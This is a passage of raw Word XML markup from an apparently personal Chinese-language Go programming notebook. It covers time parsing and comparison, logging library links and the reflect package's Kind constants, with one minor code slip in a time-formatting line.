        <w:t xml:space="preserve">t1, err1 := </w:t>
      </w:r>
      <w:r w:rsidRPr="00276F2B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>time.Parse("2006-01-02 15:04:05", time1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDA7D9A" w14:textId="77777777" w:rsidR="00276F2B" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">t2, err2 := </w:t>
      </w:r>
      <w:r w:rsidRPr="00276F2B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>time.Parse("2006-01-02 15:04:05", time2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C118278" w14:textId="77777777" w:rsidR="00276F2B" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">if err1 == nil &amp;&amp; err2 == nil &amp;&amp; </w:t>
      </w:r>
      <w:r w:rsidRPr="00276F2B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>t1.Before(t2)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C70372" w14:textId="77777777" w:rsidR="00276F2B" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println("true")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDBFBB1" w14:textId="77777777" w:rsidR="00276F2B" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11536F86" w14:textId="77777777" w:rsidR="00276F2B" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>time3 := "2021-03-20 08:50:29"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EA2053" w14:textId="77777777" w:rsidR="00276F2B" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>time4 := "2021-03-20 08:50:29"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E6F647" w14:textId="77777777" w:rsidR="00276F2B" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先把时间字符串格式化成相同的时间类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F82F1BD" w14:textId="77777777" w:rsidR="00276F2B" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>t3, _ := time.Parse("2006-01-02 15:04:05", time3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D80A15F" w14:textId="77777777" w:rsidR="00276F2B" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>t4, _ := time.Parse("2006-01-02 15:04:05", time4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABB9ED0" w14:textId="77777777" w:rsidR="00276F2B" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">if err1 == nil &amp;&amp; err2 == nil &amp;&amp; </w:t>
      </w:r>
      <w:r w:rsidRPr="00276F2B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>t3.Equal(t4)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC88194" w14:textId="77777777" w:rsidR="00276F2B" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println("true")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291FF9D0" w14:textId="77777777" w:rsidR="00276F2B" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABF5B88" w14:textId="77777777" w:rsidR="00276F2B" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFA183C" w14:textId="2A274860" w:rsidR="0089378D" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDC94A0" w14:textId="2885F99D" w:rsidR="0089378D" w:rsidRDefault="0089378D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C5C28B" w14:textId="6BD894A9" w:rsidR="0089378D" w:rsidRDefault="0089378D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ECBFD5F" w14:textId="7DA7DC61" w:rsidR="0089378D" w:rsidRDefault="0089378D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BBE688E" w14:textId="77777777" w:rsidR="0089378D" w:rsidRDefault="0089378D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F8C4AD3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="334" w:name="_Toc159779790"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>runtime</w:t>
      </w:r>
      <w:bookmarkEnd w:id="334"/>
    </w:p>
    <w:p w14:paraId="441F87F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08B03719" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B3E732D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55D56EEC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="780D2B06" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式化当前时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C387679" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lasttime, _ := time.Now().Format("2006-01-02 15:04:05")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D25CC03" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E105093" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F00E2A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="335" w:name="_Toc159779791"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>终端彩色输出</w:t>
      </w:r>
      <w:bookmarkEnd w:id="335"/>
    </w:p>
    <w:p w14:paraId="5E5C3759" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12C44639" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://blog.csdn.net/inthat/article/details/123570590</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC6B9F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78D940F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="419D8CA9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="336" w:name="_Toc159779792"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="336"/>
    </w:p>
    <w:p w14:paraId="5429F5E7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的相关库参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://juejin.cn/post/7012538461244620814</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB75D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60746131" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="337" w:name="_Toc159779793"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>github.com/sirupsen/logrus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="337"/>
    </w:p>
    <w:p w14:paraId="6BC17575" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77C3EF7A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C723C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CB3E734" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="338" w:name="_Toc159779794"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reflect</w:t>
      </w:r>
      <w:bookmarkEnd w:id="338"/>
    </w:p>
    <w:p w14:paraId="3CB976EE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">reflect.TypeOf() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态获取输入数据的类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3214556A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">reflect.ValueOf() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态获取输入数据的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511D8BE3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="758C6F22" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27906C3B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reflect.Kind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A94D717" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>const (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0C8E61" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Invalid Kind = iota</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBF1732" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Bool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE9D206" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412B097F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Int8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B181465" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Int16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D33690" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Int32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E12448" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Int64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32399C33" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Uint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672A1349" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Uint8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5432D1A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Uint16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA1D05B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Uint32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C300FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Uint64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220999CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Uintptr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655DB6D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Float32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573C5BDA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Float64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419C9CCD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Complex64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30383FD0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Complex128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F4D225" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632ECF7F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Chan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DB374C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Func</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E51144" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD40917" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546D7159" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Ptr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A253CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Slice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F75AB9A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2044FB67" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Struct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116D6AB3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    UnsafePointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA3050F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6205D47B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14B57031" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F9DC4CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3293740B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DD78ABC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F225BD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="549E9C86" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63E7AADA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="499255CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DF23C78" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="339" w:name="_Toc159779795"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fmt</w:t>
      </w:r>
      <w:bookmarkEnd w:id="339"/>
    </w:p>
    <w:p w14:paraId="21067467" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FAC5EB9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62BAA7BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
